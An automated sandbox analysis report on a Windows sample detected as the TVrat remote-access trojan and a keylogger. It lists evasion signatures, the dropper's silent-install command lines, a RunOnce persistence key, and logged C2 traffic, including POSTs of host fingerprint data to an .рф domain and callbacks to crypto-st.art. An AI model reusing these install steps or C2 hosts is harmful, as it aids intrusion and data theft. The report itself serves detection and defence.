Windows Analysis Report
wjpP1EOX0L.exe

Overview

General Information

Sample name: wjpP1EOX0L.exe
renamed because original name is a hash value
Original sample name: 7ea97972b7a7e37bdc6993c7f00830040acf4ce957243abb85d6c1232baf30c0.exe
Analysis ID: 1558734
MD5: 34dc961fe0a98ea779d7b673a48c77a0
SHA1: 7f3cf770da67a60d60c79c82df85eef66eb80d8e
SHA256: 7ea97972b7a7e37bdc6993c7f00830040acf4ce957243abb85d6c1232baf30c0
Tags: crypto-st--artexeuser-JAMESWT_MHT
Infos:

Detection

TVrat
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected TVrat
AI detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • wjpP1EOX0L.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\wjpP1EOX0L.exe" MD5: 34DC961FE0A98EA779D7B673A48C77A0)
    • wjpP1EOX0L.tmp (PID: 7360 cmdline: "C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp" /SL5="$20476,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" MD5: 90FC739C83CD19766ACB562C66A7D0E2)
      • wjpP1EOX0L.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m MD5: 34DC961FE0A98EA779D7B673A48C77A0)
        • wjpP1EOX0L.tmp (PID: 7412 cmdline: "C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp" /SL5="$2047E,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m MD5: 90FC739C83CD19766ACB562C66A7D0E2)
          • cmd.exe (PID: 7788 cmdline: "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • xcopy.exe (PID: 7836 cmdline: xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\" MD5: 7E9B7CE496D09F70C072930940F9F02C)
            • ast.exe (PID: 8036 cmdline: "C:\Users\user\AppData\Roaming\im\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • ast.exe (PID: 1312 cmdline: "C:\Users\user\AppData\Roaming\im\ast.exe" MD5: 8002D9E5851728EB024B398CF19DE390)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\im\ast.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
C:\Users\user\AppData\Roaming\im\ast.exe | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
C:\Users\user\AppData\Roaming\im\ast.exe | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
Process Memory Space: ast.exe PID: 8036 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: ast.exe PID: 8036 | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |

Source | Rule | Description | Author | Strings
10.0.ast.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
10.0.ast.exe.400000.0.unpack | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
10.0.ast.exe.400000.0.unpack | JoeSecurity_TVrat | Yara detected TVrat | Joe Security |
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\im\ast.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\im\ast.exe, ProcessId: 8036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\asg
                          No Suricata rule has matched

                          AV Detection

Source: Yara match, File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
Source: Yara match, File source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 86.3% probability
Source: C:\Users\user\AppData\Roaming\im\ast.exe, Code function: 10_2_6B8F21A0 CryptHashData,10_2_6B8F21A0
Source: C:\Users\user\AppData\Roaming\im\ast.exe, Code function: 10_2_6B8F21C0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_6B8F21C0
Source: C:\Users\user\AppData\Roaming\im\ast.exe, Code function: 10_2_6B8F2160 CryptAcquireContextA,CryptCreateHash,10_2_6B8F2160
Source: C:\Users\user\AppData\Roaming\im\ast.exe, Code function: 10_2_6B8F20A0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,10_2_6B8F20A0
Source: C:\Users\user\AppData\Roaming\im\ast.exe, Code function: 10_2_6B8D8010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B8D8010
Source: ast.exe, 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_8a9c27f0-a
Source: wjpP1EOX0L.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown, HTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: wjpP1EOX0L.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000009.00000003.2089288252.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2999895866.000000006BE30000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\libeay32.pdb source: xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3002416551.000000006C1CF000.00000002.00000001.01000000.00000011.sdmp, astrct.dll.9.dr
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000009.00000003.2088110800.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3005322508.000000006C482000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb source: xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000009.00000003.2088110800.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3005322508.000000006C482000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.2999895866.000000006BDC7000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: ast.exe, 0000000A.00000002.3007667489.000000006CFB3000.00000002.00000001.01000000.0000000F.sdmp, is-951GK.tmp.3.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3002416551.000000006C1CF000.00000002.00000001.01000000.00000011.sdmp, astrct.dll.9.dr
                          Source: Binary string: vcruntime140.i386.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385212736.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3008128485.000000006F701000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385212736.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3008128485.000000006F701000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb! source: xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdbGCTL source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385162742.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000009.00000003.2094846139.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, is-VCJTB.tmp.3.dr
                          Source: Binary string: msvcr120.i386.pdb source: xcopy.exe, 00000009.00000003.2097728621.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, msvcr120.dll.9.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: ast.exe, 0000000A.00000002.3007667489.000000006CFB3000.00000002.00000001.01000000.0000000F.sdmp, is-951GK.tmp.3.dr
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: .pdbnes\AppData\Roaming\im\ source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006758328.000000006CA31000.00000002.00000001.01000000.00000013.sdmp, is-UA1D6.tmp.3.dr
                          Source: Binary string: C:\Users\user\AppData\Roaming\im\ast.pdb\*D{ source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385162742.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006758328.000000006CA31000.00000002.00000001.01000000.00000013.sdmp, is-UA1D6.tmp.3.dr
                          Source: Binary string: C:\Users\user\AppData\Roaming\im\ast.pdb source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.2999895866.000000006BDC7000.00000002.00000001.01000000.00000014.sdmp
Source: C:\Users\user\AppData\Roaming\im\ast.exe, Code function: 11_2_07065021 lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_07065021
Source: global traffic, TCP traffic: 192.168.2.4:49876 -> 212.193.169.65:44335
Source: global traffic, TCP traffic: 192.168.2.4:50015 -> 195.19.105.66:44444
Source: global traffic, HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 269
Source: global traffic, HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 269 1MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64
Source: global traffic, HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 256
Source: global traffic, HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 256 1:vKlGnpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
Source: global traffic, HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 256 1:I*K1pp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
Source: global traffic, HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 256 1:6otL?:pp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
Source: global traffic, HTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1 Host: id.xn--80akicokc0aablc.xn--p1ai:443 Content-Length: 256 1:mF$~Wpp1142 104 603p1142 104 603p1142 104 603p1142 104 603p1142 104 603p1p2p4142 104 603p5142 104 603
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 2691MEC-F4-BB-EA-15-88HS53687091200HVwssojcgffqnjHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c49f2ecd4606693965f234ed5a1HS05368709120064.5-2168650/Microsoft Windows 10 Pro (10.0.19045) x64
                          Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B9009F0 recv,send,WSAGetLastError,10_2_6B9009F0
                          Source: global trafficDNS traffic detected: DNS query: id.xn--80akicokc0aablc.xn--p1ai
                          Source: global trafficDNS traffic detected: DNS query: trs011.xn--80akicokc0aablc.xn--p1ai
                          Source: global trafficDNS traffic detected: DNS query: crypto-st.art
                          Source: unknownHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000362E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2088110800.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.9.dr, is-PDD2G.tmp.3.dr, is-VCJTB.tmp.3.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2094846139.000000000362E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2088110800.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.9.dr, is-PDD2G.tmp.3.dr, is-VCJTB.tmp.3.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2534997545.00000000060BF000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr6alphasslca2023.crl0G
                          Source: ast.exe, 0000000A.00000003.2525562643.00000000060D9000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2525562643.00000000060B8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2526220762.0000000006089000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2474490964.00000000060A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                          Source: xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                          Source: xcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                          Source: ast.exe, 0000000A.00000002.2980985284.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2513039914.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php
                          Source: ast.exe, 0000000A.00000003.2973573202.0000000006088000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953370709.000000000608B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f40;a~8
                          Source: ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66
                          Source: ast.exe, 0000000A.00000003.2947103567.000000000609D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66-80akicokc0aablc.x
                          Source: ast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66/
                          Source: ast.exe, 0000000A.00000002.2992930514.0000000006088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b660
